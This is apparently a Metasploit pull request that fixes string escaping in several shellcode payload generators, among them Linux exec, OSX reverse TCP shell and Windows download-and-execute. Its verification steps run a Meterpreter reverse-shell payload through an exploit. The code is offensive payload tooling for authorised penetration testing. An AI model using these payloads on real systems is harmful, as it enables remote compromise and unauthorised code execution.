### PR TITLE
Escape strings embedded into the assembly of multiple payloads

### DIFF
--- a/modules/payloads/singles/linux/x64/exec.rb
+++ b/modules/payloads/singles/linux/x64/exec.rb
@@ -39,7 +39,8 @@ module MetasploitModule
 
   def generate(_opts = {})
     cmd = datastore['CMD'] || ''
-    cmd = cmd.bytes.map { |byte| "0x%02x" % byte }.join(', ')
+    cmd_length = cmd.bytesize
+    cmd = cmd.bytes.map { |byte| '0x%02x' % byte }.join(', ')
     nullfreeversion = datastore['NullFreeVersion']
 
     if cmd.empty?
@@ -94,19 +95,20 @@ module MetasploitModule
       pushw_c_opt = 'dd 0x632d6866' # pushw 0x632d (metasm doesn't support pushw)
 
       if nullfreeversion
-        if cmd.length > 0xffff
+        if cmd_length > 0xffff
           raise RangeError, 'CMD length has to be smaller than %d' % 0xffff, caller
         end
 
-        if cmd.length <= 0xff # 255
+        if cmd_length <= 0xff # 255
           breg = 'bl'
         else
           breg = 'bx'
-          if (cmd.length & 0xff) == 0 # let's avoid zeroed bytes
-            cmd += ' '
+          if (cmd_length & 0xff) == 0 # let's avoid zeroed bytes
+            cmd += ', 0x20'
+            cmd_length += 1
           end
         end
-        mov_cmd_len_to_breg = "mov #{breg}, #{cmd.length}"
+        mov_cmd_len_to_breg = "mov #{breg}, #{cmd_length}"
 
         # 48 bytes without cmd (null-free)
         payload = <<-EOS

--- a/modules/payloads/singles/linux/x64/exec.rb
+++ b/modules/payloads/singles/linux/x64/exec.rb
@@ -39,6 +39,7 @@ module MetasploitModule
 
   def generate(_opts = {})
     cmd = datastore['CMD'] || ''
+    cmd = cmd.bytes.map { |byte| "0x%02x" % byte }.join(', ')
     nullfreeversion = datastore['NullFreeVersion']
 
     if cmd.empty?
@@ -144,7 +145,7 @@ module MetasploitModule
             syscall                 ; execve("//bin/sh", ["//bin/sh", "-c", "*CMD*"], NULL)
           tocall:
             call afterjmp
-            db "#{cmd}"             ; arbitrary command
+            db #{cmd}               ; arbitrary command
         EOS
       else
         # 37 bytes without cmd (not null-free)
@@ -163,7 +164,7 @@ module MetasploitModule
 
             push rdx                ; NULL
             call continue
-            db "#{cmd}", 0x00       ; arbitrary command
+            db #{cmd}, 0x00         ; arbitrary command
           continue:
             push rsi                ; "-c"
             push rdi                ; "/bin/sh"

--- a/modules/payloads/singles/linux/x64/set_hostname.rb
+++ b/modules/payloads/singles/linux/x64/set_hostname.rb
@@ -36,6 +36,7 @@ module MetasploitModule
     if length > 0xff
       fail_with(Msf::Module::Failure::BadConfig, 'HOSTNAME must be less than 255 characters.')
     end
+    hostname = hostname.bytes.map { |byte| '0x%02x' % byte }.join(', ')
 
     payload = %^
       push 0xffffffffffffff56 ; sethostname() syscall number.
@@ -57,7 +58,7 @@ module MetasploitModule
 
     str:
       call end
-      db "#{hostname}A"
+      db #{hostname}, 0x41
     ^
 
     Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string

--- a/modules/payloads/singles/linux/x86/exec.rb
+++ b/modules/payloads/singles/linux/x86/exec.rb
@@ -52,6 +52,8 @@ module MetasploitModule
 
   def generate(_opts = {})
     cmd = datastore['CMD'] || ''
+    cmd_length = cmd.bytesize
+    cmd = cmd.bytes.map { |byte| '0x%02x' % byte }.join(', ')
     nullfreeversion = datastore['NullFreeVersion']
     if cmd.empty?
       #
@@ -89,19 +91,20 @@ module MetasploitModule
       #
       pushw_c_opt = 'dd 0x632d6866' # pushw 0x632d (metasm doesn't support pushw)
       if nullfreeversion
-        if cmd.length > 0xffff
+        if cmd_length > 0xffff
           raise RangeError, 'CMD length has to be smaller than %d' % 0xffff, caller
         end
 
-        if cmd.length <= 0xff # 255
+        if cmd_length <= 0xff # 255
           breg = 'bl'
         else
           breg = 'bx'
-          if (cmd.length & 0xff) == 0 # let's avoid zeroed bytes
-            cmd += ' '
+          if (cmd_length & 0xff) == 0 # let's avoid zeroed bytes
+            cmd += ', 0x20'
+            cmd_length += 1
           end
         end
-        mov_cmd_len_to_breg = "mov #{breg}, #{cmd.length}"
+        mov_cmd_len_to_breg = "mov #{breg}, #{cmd_length}"
         # 47/49 bytes without cmd (null-free)
         payload = <<-EOS
             xor ebx, ebx
@@ -127,7 +130,7 @@ module MetasploitModule
             int 0x80
           tocall:
             call afterjmp          ; call/pop cmd address
-            db "#{cmd}"
+            db #{cmd}
         EOS
       else
         # 36 bytes without cmd (not null-free)
@@ -143,7 +146,7 @@ module MetasploitModule
             mov ebx, esp
             push edx
             call continue
-            db "#{cmd}", 0x00
+            db #{cmd}, 0x00
           continue:
             push edi
             push ebx

--- a/modules/payloads/singles/linux/x86/read_file.rb
+++ b/modules/payloads/singles/linux/x86/read_file.rb
@@ -34,6 +34,7 @@ module MetasploitModule
 
   def generate(_opts = {})
     fd = datastore['FD']
+    path = (datastore['PATH'] || '').bytes.map { |byte| '0x%02x' % byte }.join(', ')
 
     payload_data = <<-EOS
       jmp file
@@ -65,7 +66,7 @@ module MetasploitModule
 
       file:
         call open
-        db "#{datastore['PATH']}", 0x00
+        db #{path}, 0x00
     EOS
 
     Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string

--- a/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
@@ -44,6 +44,7 @@ module MetasploitModule
     end
 
     cmd = (datastore['CMD'] || '') + "\x00"
+    cmd = cmd.bytes.map { |byte| '0x%02x' % byte }.join(', ')
     encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack1('N')
     encoded_host = Rex::Socket.addr_aton(lhost).unpack1('V')
     encoded_host_port = format('0x%<encoded_host>.8x%<encoded_port>.8x', { encoded_host: encoded_host, encoded_port: encoded_port })
@@ -80,7 +81,7 @@ module MetasploitModule
       xor rax,rax
       mov eax,0x200003b
       call load_cmd
-      db "#{cmd}", 0x00
+      db #{cmd}, 0x00
     load_cmd:
       pop rdi
       xor rdx,rdx

--- a/modules/payloads/singles/windows/download_exec.rb
+++ b/modules/payloads/singles/windows/download_exec.rb
@@ -124,6 +124,10 @@ module MetasploitModule
 
     # get protocol specific stuff
 
+    server_uri = server_uri.bytes.map { |byte| '0x%02x' % byte }.join(', ')
+    filename = filename.bytes.map { |byte| '0x%02x' % byte }.join(', ')
+    server_host = server_host.bytes.map { |byte| '0x%02x' % byte }.join(', ')
+
     # create actual payload
     payload_data = %^
       cld
@@ -222,7 +226,7 @@ module MetasploitModule
       call httpopenrequest
 
     server_uri:
-      db "#{server_uri}", 0x00
+      db #{server_uri}, 0x00
 
     create_file:
       jmp.i8 get_filename
@@ -293,13 +297,13 @@ module MetasploitModule
 
     get_filename:
       call get_filename_return
-      db "#{filename}",0x00
+      db #{filename}, 0x00
 
     get_server_host:
       call internetconnect
 
     server_host:
-      db "#{server_host}", 0x00
+      db #{server_host}, 0x00
     end:
 ^
     self.assembly = payload_data

--- a/modules/payloads/singles/windows/messagebox.rb
+++ b/modules/payloads/singles/windows/messagebox.rb
@@ -40,6 +40,8 @@ module MetasploitModule
   # Construct the payload
   #
   def generate(_opts = {})
+    title = (datastore['TITLE'] || '').bytes.map { |byte| '0x%02x' % byte }.join(', ')
+    text = (datastore['TEXT'] || '').bytes.map { |byte| '0x%02x' % byte }.join(', ')
     style = 0x00
     case datastore['ICON'].upcase.strip
       # default = NO
@@ -89,10 +91,10 @@ module MetasploitModule
       call ebp
       push #{style}
       call get_title
-      db "#{datastore['TITLE']}", 0x00
+      db #{title}, 0x00
     get_title:
       call get_text
-      db "#{datastore['TEXT']}", 0x00
+      db #{text}, 0x00
     get_text:
       push 0
       push #{block_api_hash('user32.dll', 'MessageBoxA')}

--- a/modules/payloads/singles/windows/x64/download_exec.rb
+++ b/modules/payloads/singles/windows/x64/download_exec.rb
@@ -40,6 +40,10 @@ module MetasploitModule
     url = datastore['URL'] || 'http://localhost/hi.exe'
     file = datastore['FILEPATH'] || 'fox.exe'
     display = datastore['DISPLAY'] || 'HIDE'
+    url_length = url.bytesize
+    file_length = file.bytesize
+    url = url.bytes.map { |byte| '0x%02x' % byte }.join(', ')
+    file = file.bytes.map { |byte| '0x%02x' % byte }.join(', ')
 
     payload = %^
             cld
@@ -61,17 +65,17 @@ module MetasploitModule
 
         SetUrl:
             call SetFile
-            db "#{url}A"
+            db #{url}, 0x41
 
         SetFile:
             pop rdx ; 2nd argument
-            xor byte [rdx+#{url.length}], 'A' ; null terminator
+            xor byte [rdx+#{url_length}], 'A' ; null terminator
             call UrlDownloadToFile
-            db "#{file}C"
+            db #{file}, 0x43
 
         UrlDownloadToFile:
             pop r8 ; 3rd argument
-            xor byte [r8+#{file.length}], 'C' ; null terminator
+            xor byte [r8+#{file_length}], 'C' ; null terminator
             xor rcx,rcx ; 1st argument
             xor r9,r9   ; 4th argument
             sub rsp, 8
@@ -81,11 +85,11 @@ module MetasploitModule
 
         SetCommand:
             call Exec
-            db "cmd /c #{file}F"
+            db "cmd /c ", #{file}, 0x46
 
         Exec:
             pop rcx ; 1st argument
-            xor byte [rcx+#{file.length + 7}], 'F' ; null terminator
+            xor byte [rcx+#{file_length + 7}], 'F' ; null terminator
             mov r10d, #{block_api_hash('kernel32.dll', 'WinExec')}
             xor rdx, rdx ; 2nd argument
         ^

--- a/modules/payloads/singles/windows/x64/messagebox.rb
+++ b/modules/payloads/singles/windows/x64/messagebox.rb
@@ -36,6 +36,8 @@ module MetasploitModule
   end
 
   def generate(_opts = {})
+    title = (datastore['TITLE'] || '').bytes.map { |byte| '0x%02x' % byte }.join(', ')
+    text = (datastore['TEXT'] || '').bytes.map { |byte| '0x%02x' % byte }.join(', ')
     style = 0x00
     case datastore['ICON'].upcase.strip
       # default = NO
@@ -88,11 +90,11 @@ module MetasploitModule
       call rbp
       mov r9, #{style}
       call get_text
-      db "#{datastore['TEXT']}", 0x00
+      db #{text}, 0x00
     get_text:
       pop rdx
       call get_title
-      db "#{datastore['TITLE']}", 0x00
+      db #{title}, 0x00
     get_title:
       pop r8
       xor rcx,rcx


### PR DESCRIPTION
This fixes a bug in the `linux/x64/exec` payload that was caused by the `CMD` datastore option being placed in the assembly source without being escaped. The proposed fix is to encode the bytes as hex literals. This by extension fixes the `cmd/unix/python/meterpreter/reverse_tcp` payload on x64 targets as used by the copy_fail exploit.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] use the copy_fail exploit on a 64-bit target with the `cmd/unix/python/meterpreter/reverse_tcp` payload, or just directly use `linux/x64/exec` and set the command to a generated instance of `cmd/unix/python/meterpreter/reverse_tcp` and see it work.